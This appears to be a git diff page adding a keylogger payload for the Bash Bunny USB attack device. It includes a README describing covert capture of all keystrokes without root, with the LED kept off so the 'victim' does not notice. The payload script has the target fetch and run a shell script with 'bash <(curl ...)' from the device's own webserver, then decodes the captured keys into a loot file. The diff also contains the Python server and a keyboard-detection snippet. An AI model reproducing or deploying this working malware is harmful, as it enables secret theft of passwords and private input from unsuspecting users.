getdevicetouse=$(xinput |grep keyboard | sed 's/slave keyboard//g' | while IFS= read -r line ;do [[ $line != *"Virtual"* ]] && [[ $line == *"keyboard"* ]] && echo $line | awk '{ for (i=1; i<=NF; ++i) { if ($i ~ "id=") print $i} }'; done)
|
||||||
|
[[ -z $getdevicetouse ]] || checkonbunny
|
|
@ -0,0 +1,28 @@
|
||||||
|
# Keylogger For Bash Bunny
|
||||||
|
|
||||||
|
Author: TheDragonkeeper
|
||||||
|
|
||||||
|
Version: Version 1
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
Dirty keylogger. Runs a webserver to pull code from for multiOS targeting
|
||||||
|
|
||||||
|
Captures all keyboard input without the need for root access
|
||||||
|
Uses the user keyboard map file for decoding the captured data
|
||||||
|
|
||||||
|
## STATUS
|
||||||
|
|
||||||
|
| LED | Status |
|
||||||
|
| ---------------- | ----------------------------------------------------------------------------- |
|
||||||
|
| Blue flash | Booting |
|
||||||
|
| Red slow | Waiting on webserver |
|
||||||
|
| Blue Fast | Identifying Target and deploying accordingly |
|
||||||
|
| LED OFF | Capturing data, no led for victim to spot, waiting for switch position change |
|
||||||
|
| LED Red Fast | Decoding keys, Then doing any cleanup required |
|
||||||
|
| Green flashing | Task complete, ready to unplug |
|
||||||
|
|
||||||
|
Still WIP, Currently supports linux (tested on ubuntu)
|
||||||
|
If you want to add payloads for OSX or Windows place them into the switch folder then,
|
||||||
|
Change TARGET_OS= to 'auto' and add the payloads to lines 15,16 as well as the clean up to lines 40,41 in payload.txt
|
||||||
|
|
|
@ -0,0 +1,43 @@
|
||||||
|
TARGET_OS='LINUX'
|
||||||
|
|
||||||
|
LED B 100
|
||||||
|
ATTACKMODE HID STORAGE ECM_ETHERNET
|
||||||
|
sleep 3
|
||||||
|
LED R SLOW
|
||||||
|
GET HOST_IP
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
udisk mount
|
||||||
|
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||||
|
python webserver.py &
|
||||||
|
while true; do [[ $(curl $HOST_IP:8080/index.html) ]] && break ; done
|
||||||
|
LED B FAST
|
||||||
|
[[ $TARGET_OS == 'auto' ]] && GET TARGET_OS
|
||||||
|
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
|
||||||
|
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
|
||||||
|
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX bash \-c \'bash \<\(curl http\:\/\/$HOST_IP\:8080\/Linux\.sh\)\' \&
|
||||||
|
LED
|
||||||
|
WAIT
|
||||||
|
LED R 0
|
||||||
|
cd /root/udisk/loot
|
||||||
|
keystate=''
|
||||||
|
_ctrl='0'
|
||||||
|
_alt='0'
|
||||||
|
_shift='0'
|
||||||
|
for line in $(cat 'keys')
|
||||||
|
do
|
||||||
|
if [ $line != 'key' ]; then
|
||||||
|
if [ $line == 'press' ] || [ $line == 'release' ]; then
|
||||||
|
keystate=$line
|
||||||
|
else
|
||||||
|
_spaces=$(printf '%*s' $((4-${#line})) | tr ' ' ' ')
|
||||||
|
searchparams='keycode'"$_spaces"$line
|
||||||
|
key=$(cat 'maps' | grep "$searchparams" | awk '{print $4}')
|
||||||
|
echo "Ctrl="$_ctrl" Alt="$_alt" Shift="$_shift" "$keystate" "$key >> 'decoded'
|
||||||
|
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
|
||||||
|
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
|
||||||
|
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX killall xinput
|
||||||
|
LED G 0
|
|
@ -0,0 +1,28 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
|
||||||
|
from os import curdir, sep
|
||||||
|
PORT_NUMBER = 8080
|
||||||
|
class myHandler(BaseHTTPRequestHandler):
|
||||||
|
def do_GET(self):
|
||||||
|
if self.path=="/":
|
||||||
|
self.path="/"
|
||||||
|
try:
|
||||||
|
sendReply = False
|
||||||
|
if self.path.endswith(".sh"):
|
||||||
|
mimetype='text/plain'
|
||||||
|
sendReply = True
|
||||||
|
if sendReply == True:
|
||||||
|
f = open(curdir + sep + self.path)
|
||||||
|
self.send_response(200)
|
||||||
|
self.send_header('Content-type',mimetype)
|
||||||
|
self.end_headers()
|
||||||
|
self.wfile.write(f.read())
|
||||||
|
f.close()
|
||||||
|
return
|
||||||
|
except IOError:
|
||||||
|
self.send_error(404,'File Not Found: %s' % self.path)
|
||||||
|
try:
|
||||||
|
server = HTTPServer(('0.0.0.0', PORT_NUMBER), myHandler)
|
||||||
|
server.serve_forever()
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
server.socket.close()
|
Loading…
Reference in New Issue